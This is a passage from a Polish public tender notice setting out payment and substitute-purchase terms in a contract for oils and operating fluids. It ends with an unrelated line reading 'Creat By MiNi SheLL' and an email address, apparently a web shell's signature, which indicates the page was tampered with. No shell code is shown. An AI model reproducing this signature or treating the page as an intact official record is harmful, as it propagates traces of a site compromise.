17. ZAMAWIAJĄCY zastrzega sobie możliwość zakupu niedostarczonych w terminie produktów (o takich samych parametrach) z innych źródeł oraz zmniejszenie ilości produktów objętych umową o ilości zakupione u innego dostawcy. W przypadku gdy ceny zakupu olejów lub płynów eksploatacyjnych u innego dostawcy będą wyższe niż zawarte w załączniku nr 1 do niniejszej umowy, ZAMAWIAJĄCY kwotą wynikającą z różnicy w cenie i ewentualnymi kosztami dostawy obciąży WYKONAWCĘ.
18. Rozliczenie następować będzie po każdej należycie zrealizowanej dostawie na podstawie faktury VAT wystawionej przez WYKONAWCĘ. Faktura zawierać będzie m.in. rodzaj i ilość dostarczonych produktów, ceny jednostkowe, kwotę do zapłaty.
19. WYKONAWCA wystawi jedną fakturę obejmującą wszystkie oleje i płyny eksploatacyjne dostarczone w jednej dostawie.
20. Należność za zakupione produkty będzie dokonywana przelewem na wskazany przez WYKONAWCĘ  w fakturze VAT rachunek bankowy w terminie 30 dni od daty jej otrzymania. 
21. Za termin zapłaty uznaje się dzień obciążenia przez bank rachunku Płatnika.
22. W wyjątkowych sytuacjach dopuszcza się możliwość przedłużenia terminu płatności na warunkach ustalonych z WYKONAWCĄ.

Projekt umowy, jaka zostanie zawarta z Wykonawcą, którego oferta zostanie uznana za najkorzystniejszą, stanowi Załącznik nr 9 do Ogłoszenia.</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com